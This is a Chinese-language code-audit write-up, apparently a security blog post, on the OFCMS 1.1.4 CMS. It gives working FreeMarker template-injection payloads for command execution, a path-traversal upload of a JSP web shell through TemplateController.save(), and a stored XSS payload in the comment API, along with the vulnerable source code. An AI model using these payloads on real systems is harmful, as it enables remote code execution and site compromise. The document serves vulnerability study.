ofcms1.1.4 内容管理系统代码审计

环境配置

环境配置保姆级教程

1	https://blog.csdn.net/Alexz__/article/details/116229266

git加载项目
maven设置

然后maven重新加载项目
配置tomcat

注意url和application context是一致的

deployment

数据库配置

新建数据库，注意mysql驱动，我下载驱动失败，使用的是本地maven仓库的驱动

解决办法：(9条消息) IDEA连接Mysql失败：下载驱动失败，Failed todownload Cannot download Read timed out_疯狂的帆的博客-CSDN博客

导入数据库

选择之前创建的ofcms_database，run

查看数据库，可以看到初始化成功

启动，在localhost:8080/ofcms_admin

然后配置之后（数据库这里我删除了，然后又整了一遍）

经过一段时间的加载，估计两三分钟，显示如下

关于ofcms目录简析

(9条消息) 从OFCMS出发，浅析JavaWeb项目技术结构及其功能_Alexz__的博客-CSDN博客

Alexz__师傅的分析

代码审计

SSTI

模板注入

首先需要了解freemarker模板注入

FreeMarker模板注入实现远程命令执行 - Eleven_Liu - 博客园 (cnblogs.com)

1	<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

点击联系我们，弹计算器

查看pom.xml，其中含有freemarker

该模板设置–>模板文件对应的文件是ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java

这里获取file_content采用的是getParameter函数.

贴一些找的payload

1
2

freemarker.template.utility里面有个Execute类，如下图所示，这个类会执行它的参数，因此我们可以利用new函数新建一个Execute类，传输我们要执行的命令作为参数，从而构造远程命令执行漏洞。
<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

1
2

freemarker.template.utility里面有个ObjectConstructor类，如下图所示，这个类会把它的参数作为名称，构造了一个实例化对象。因此我们可以构造一个可执行命令的对象，从而构造远程命令执行漏洞。
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

1
2
3

没成功
freemarker.template.utility里面的JythonRuntime，可以通过自定义标签的方式，执行Python命令，从而构造远程命令执行漏洞。
<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")</@value>

1	${"freemarker.template.utility.Execute"?new()("calc.exe")}

1 2	没成功 [#ftl][#assign value= "freemarker.template.utility.Execute"?new()]${ value("calc.exe")}

任意文件上传漏洞

还是之前的ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java对应的save()函数

分析函数，会接受dirs,file_name,file_content,分别对应上传的路径，文件名，文件内容，并且没有添加过滤！！！，所以可以上传jsp木马

public void save() {
    String resPath = getPara("res_path");
    File pathFile = null;
    if("res".equals(resPath)){
        pathFile = new File(SystemUtile.getSiteTemplateResourcePath());
    }else {
        pathFile = new File(SystemUtile.getSiteTemplatePath());
    }
    String dirName = getPara("dirs");
    if (dirName != null) {
        pathFile = new File(pathFile, dirName);
    }
    String fileName = getPara("file_name");
    // 没有用getPara原因是，getPara因为安全问题会过滤某些html元素。
    String fileContent = getRequest().getParameter("file_content");
    fileContent = fileContent.replace("&lt;", "<").replace("&gt;", ">");
    File file = new File(pathFile, fileName);
    FileUtils.writeString(file, fileContent);
    rendSuccessJson();
}

抓包，修改dirs为../../../static，file_name为shell.jsp，file_content为jsp一句话木马的url编码

生成一句话木马

1	http://localhost:8081/ofcms_admin/static/shell.jsp?cmd=whoami

存储型xss

在用户评论处存在存储型xss漏洞，无需登录后台

1	<script>alert(1111)</script>

我随便找了一个公司新闻的地方

提交评论

效果如下

存储型xss

源码分析

对应的源码ofcms-api\src\main\java\com\ofsoft\cms\api\v1\CommentApi.java

@Action(path = "/comment")
public class CommentApi extends ApiBase {
    /**
     * 获取内容信息
     */
    @ApiMapping(method = RequestMethod.GET)
    @ParamsCheck(
            {@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"),
                    @ParamsCheckType(name = "site_id")})
    public void save() {
        try {
            Map params = getParamsMap();
            params.put("comment_ip", IpKit.getRealIp(getRequest()));
            Db.update(Db.getSqlPara("cms.comment.save", params));
            rendSuccessJson();
        } catch (Exception e) {
            e.printStackTrace();
            rendFailedJson();
        }
    }
}